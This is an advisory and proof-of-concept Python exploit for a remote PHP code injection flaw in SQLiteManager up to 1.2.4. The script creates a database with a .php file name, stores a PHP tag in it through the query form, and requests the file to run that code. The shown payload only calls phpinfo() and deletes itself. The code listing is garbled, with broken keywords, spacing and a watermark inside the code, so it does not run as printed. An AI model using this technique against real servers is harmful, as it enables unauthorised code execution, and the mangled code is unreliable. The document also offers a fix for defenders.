Overview:
========================================================== ======================================
Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Author: RealGame
Developer: http://www.Relagame.co.il
: Http://sourceforge.net/projects/sqlitemanager/
Affected version <= 1.2.4
Test System: Windows XP, Debian 2.6.32-46
========================================================== ======================================
Affected Programs
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
========================================================== ======================================
Program Introduction
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
========================================================== ======================================
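Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
Note: removing every '.' stops the submitted dbpath from carrying a script extension such as .php, but it is a stopgap: it also alters any legitimate database file name that contains a dot. A more durable fix is to accept only a fixed, non-executable extension for new database files and to keep the database directory outside the web root (or deny script execution in it).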
========================================================== ======================================
Import re
Import urllib2
From urllib import urlencode
From sys import argv, exit
# Helper: returns `value` with everything matching the tag pattern removed (re.sub).
# NOTE(review): the whole listing was garbled by extraction/translation (capitalised
# keywords, lost indentation, spaces inserted inside string literals), so it does
# not parse as Python in the form shown here.
Def strip_tags (value ):
# Strip tags with RegEx
Return re. sub ('<[^>] *?> ', '', Value)
# Looks up the numeric/opaque id that SQLiteManager assigned to a database name.
# Fetches `sqliteUrl` (the caller passes the left.php database list), collects the
# cells marked class "name_db", and for the cell whose tag-stripped text matches
# `myDbName` returns whatever follows the Dbsel query parameter in that cell.
# Returns None when the page is empty or no cell matches.
Def getDbId (sqliteUrl, myDbName ):
# Find Components
# urllib2.urlopen(url, data, timeout): data=None means GET, 120 is the timeout in seconds.
HtmlRes = urllib2.urlopen (sqliteUrl, None, 120). read ()
If htmlRes:
# If you found it take all the rows
Td = re. findall ('<td class = "name_db"> (.*?) </Td> ', htmlRes, re. DOTALL)
# Compare each cell's visible text (tags stripped) with the wanted name
For element in td:
If strip_tags (element) = myDbName:
# Return Id
Return "". join (re. findall ('\? Dbsel = (.*?) "', Element, re. DOTALL ))
Return None
# Proof-of-concept driver (Python 2: urllib2, print statement). Takes the base URL of
# a SQLiteManager install as argv[1] and walks the four requests described below.
# NOTE(review): the trailing "www.2cto.com" on the Def line is a watermark from the
# hosting site, not code; together with the other extraction damage it means the
# listing is not runnable as shown.
#
# Root cause demonstrated: the "savedb" action accepts a client-chosen database file
# name (dbpath) including its extension, so a database file can be created under a
# .php name. The advisory's fix in ./include/add_database.php targets exactly this
# dbpath handling.
#
# Defender view: in web-server access logs this shows up as a POST to main.php that
# creates a database whose dbpath ends in a script extension, followed shortly by a
# GET for that same file name and then a delete action for the database.
# (Parameter-name casing below is unreliable because of the garbling.)
Def main (): www.2cto.com
Print \
'Sqlitemanager Exploit \ n' + \
'Made By RealGame \ n' + \
'Http: // www. RealGame. co. il \ N'
# No target URL given: print usage and stop
If len (argv) <2:
# Replace ('\', '/')-To Do The Same In Win And Linux
Filename = argv [0]. replace ('\', '/'). split ('/') [-1]
Print 'execute Example: '+ filename + 'HTTP: // 127.0.0.1/sqlite/\ N'
Exit ()
SqliteUrl = argv [1]
# Database display name and the on-disk file name it is created under; the .php
# extension on the file name is what the vulnerable code fails to reject.
MyDbName = "phpinfo"
MyDbFile = "phpinfo. php"
# Create Database
# Step 1: POST the "savedb" action to main.php with the attacker-chosen dbpath.
Params = {'dbname': myDbName,
'Dbversion': '2 ',
'Dbrealpath': None,
'Dbpath': myDbFile,
'Action': 'savedb '}
Urllib2.urlopen (sqliteUrl + "main. php", urlencode (params), 120)
# Get Database ID
# Step 2: read the database list (left.php) to learn the id of the new database.
DbId = getDbId (sqliteUrl + "left. php", myDbName)
# If Database Created
If dbId:
# Create Table + Shell Creator
# Step 3: run SQL through the manager's own query form so that a text value holding
# a PHP tag is stored in the database file. The stored code here only calls
# phpinfo() and then unlink() — presumably on the file itself, so the demo cleans up.
Params = {'displayquery': 'create TABLE temptab (codetab text); \ n' + \
'Insert INTO temptab VALUES (\ '<? Php phpinfo (); unlink (_ FILE _);?> \ '); \ N ',
'Sqlfile': None,
'Action': 'SQL ',
'Sqltype': '1 '}
Urllib2.urlopen (sqliteUrl + "main. php? Dbsel = % s & table = temptab "% dbId, urlencode (params), 120)
# Inject Code
# Step 4: request the database file by its URL. Because it carries a .php name and
# sits under the web root, the server hands it to the PHP interpreter.
Urllib2.urlopen (sqliteUrl + mydb file, None, 120)
# Remove Database
# Step 5: delete the database entry again via the "del" action.
Urllib2.urlopen (sqliteUrl + "main. php? Dbsel = % s & table = & view = & trigger = & function = & action = del "% dbId, None, 120)
Print 'succeed'
Return
# Reached only when no database id was found after the create request
Print 'failed'
# Script entry guard: calls Main () when the file is executed directly.
# NOTE(review): garbled by extraction like the rest of the listing.
If _ name _ = '_ main __':
Main ()